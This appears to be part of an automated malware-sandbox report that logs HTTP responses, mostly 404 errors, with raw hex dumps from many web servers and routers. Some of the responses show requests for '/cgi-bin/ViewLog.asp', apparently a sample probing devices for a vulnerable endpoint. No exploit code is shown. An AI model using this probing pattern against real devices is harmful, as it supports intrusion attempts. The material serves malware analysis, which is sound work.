52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:19 GMTServer: nginx/1.21.6Content-Type: text/htmlContent-Length: 358Last-Modified: Tue, 12 Sep 2023 08:09:13 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipConnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:19 GMTServer: ApacheContent-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 08:59:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:20 GMTServer: ApacheContent-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 13:59:20 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 13:59:20 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundStatus: 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheTransfer-Encoding: chunkedCONTENT-LANGUAGE: enDate: Mon, 18 Mar 2024 08:59:23 GMTServer: lighttpd/1.4.39Data Raw: 30 66 35 65 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 0a 32 30 31 38 20 42 65 6c 6b 69 6e 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 2c 20 49 6e 63 2e 20 61 6e 64 2f 6f 72 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 0a 24 41 75 74 68 6f 72 24 0a 24 44 61 74 65 54 69 6d 65 24 0a 24 49 64 24 0a 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 69 6e 6b 73 79 73 20 53 6d 61 72 74 20 57 69 2d 46 69 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 62 69 67 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 42 45 47 49 4e 5f 43 4f 4d 42 49 4e 45 44 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 72 65 73 65 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 6f 6e 6e 65 63 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 61 70 70 6c 65 74 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundStatus: 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheTransfer-Encoding: chunkedCONTENT-LANGUAGE: enDate: Mon, 18 Mar 2024 08:59:24 GMTServer: lighttpd/1.4.39Data Raw: 30 66 35 65 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 0a 32 30 31 38 20 42 65 6c 6b 69 6e 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 2c 20 49 6e 63 2e 20 61 6e 64 2f 6f 72 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 0a 24 41 75 74 68 6f 72 24 0a 24 44 61 74 65 54 69 6d 65 24 0a 24 49 64 24 0a 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 69 6e 6b 73 79 73 20 53 6d 61 72 74 20 57 69 2d 46 69 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 62 69 67 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 42 45 47 49 4e 5f 43 4f 4d 42 49 4e 45 44 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 72 65 73 65 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 6f 6e 6e 65 63 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 61 70 70 6c 65 74 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 31 37 38 36 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:59:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingETag: W/"654334a6-156"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 90 bd 4e c4 30 10 84 7b 9e c2 58 a2 74 9c 13 5d 7e ae 01 6a 28 68 a8 90 63 6f ce 96 6c af 65 6f c8 85 a7 07 27 5c 45 b5 df ac 76 67 a4 19 ee 9f 5f 9f de 3f de 5e 98 a5 e0 cf 77 c3 31 18 1b dc 9c 55 00 56 b2 1e b9 25 4a a5 93 52 7b 5c cc aa b6 22 0a 29 72 5a 68 8c 04 91 9a f2 d8 2c 45 80 2a 24 4e 8d 0a ea 1b a3 5a 4b a3 31 48 c8 19 f3 67 52 17 90 41 b9 7a ae a2 06 61 b0 2a 11 54 4a 2e 5e 9a 1a cb d9 1e 39 61 36 90 47 de 72 56 68 f3 30 72 fc 82 3c 7b 5c 3b eb 8c 81 d8 df b4 b8 fe db 6c b7 8d 05 77 b1 d4 9d da f6 a1 5f 9d 21 7b 60 c2 e2 c8 61 ec d4 54 d0 2f 04 3d 61 ea da 74 ed 3d cc b4 43 de 1f 2b 4d 48 84 a1 22 67 87 df c8 ab 0b 67 bb e3 9f 38 0f f2 e8 ea b7 3d b9 d7 c7 7e 00 d9 11 de 34 56 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7eN0{Xt]~j(hcoleo'\Evg_?^w1UV%JR{\")rZh,E$NZK1HgRAzaTJ.^9a6GrVh0r<{\;lw_!{`aT/=at=C+MH"gg8=~4V0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:25 GMTServer: Apache/2.2.15 (Red Hat)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 189Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e c1 0e 82 30 10 44 ef 7c c5 ca 1d 16 0d c7 a6 07 05 22 09 22 31 d5 c4 23 d8 15 9a 20 45 5a 24 fe bd a0 17 8f b3 33 6f 66 d9 2a 3a ee c4 b5 88 61 2f 0e 19 14 e7 6d 96 ee c0 f5 10 d3 58 24 88 91 88 7e ce c6 0f 10 e3 dc e5 0e 6b ec a3 e5 ac a1 52 ce c2 2a db 12 0f 83 10 72 6d 21 d1 63 27 19 fe 8e 0e c3 6f 88 55 5a be 17 6e cd ff 32 b3 72 58 cf 45 43 30 d0 73 24 63 49 c2 f9 94 01 de 6a e5 55 aa c3 8b a2 29 d3 b5 5f 9a 1e a6 d2 40 37 c3 f7 05 06 dd 81 6d 94 01 43 c3 8b 06 9f 61 bf 8c 7d 67 e6 e2 e5 3d e7 03 7b f7 ab 8c d9 00 00 00 Data Ascii: M0D\|""1# EZ$3of:a/mX$~kRrm!c'oUZn2rXEC0s$cIjU)_@7mCa}g={
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 14:58:24 GMTServer: Apache/2.2.23 (Unix)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 242Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4f c1 4e c3 30 0c bd f7 2b cc 4e 70 58 dd 96 49 70 88 22 c1 da 89 49 65 54 90 22 71 cc 16 b3 44 1a 49 49 32 06 7f 4f da 09 09 3d c9 92 ed f7 fc 9e d9 45 fd b4 14 6f 5d 03 0f e2 b1 85 ae bf 6f d7 4b 98 cd 11 d7 8d 58 21 d6 a2 3e 6f aa bc 40 6c 36 33 9e 31 1d 3f 0e 9c 69 92 2a 35 d1 c4 03 f1 45 b1 80 8d 8b b0 72 47 ab 18 9e 87 19 c3 89 c4 b6 4e fd 8c ba 92 ff e3 a4 2e 63 03 17 9a c0 d3 e7 91 42 24 05 fd 73 0b b8 db 9b f9 d6 58 7c 35 74 6a dd 3e 97 61 80 93 0c 60 93 c1 fb 68 00 ce 42 d4 26 40 20 ff 45 3e 67 38 8c e7 7d 2a 52 29 4f 21 f0 bb 41 ee 34 61 95 27 5c c3 65 6f cd f7 15 bc 4c 74 90 11 ca ea 26 2f 12 4a e8 9c 8f 70 5b 30 fc 53 a6 d4 53 de 14 7e fc 33 fb 05 e6 ff 94 27 22 01 00 00 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2c 0a 20 61 64 6d 69 6e 20 61 6e 64 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 61 6e 64 20 61 6e 79 74 68 69 6e 67 20 79 6f 75 20 6d 69 67 68 74 20 68 61 76 65 20 64 6f 6e 65 20 74 68 61 74 20 6d 61 79 20 68 61 76 65 0a 63 61 75 73 65 64 20 74 68 65 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 33 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 2a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: MON0+NpXIp"IeT"qDII2O=Eo]oKX!>o@l631?i5ErGN.cB$sX\|5tj>a`hB&@ E>g8}R)O!A4a'\eoLt&/Jp
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:25 GMTServer: Apache/2.4.38 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
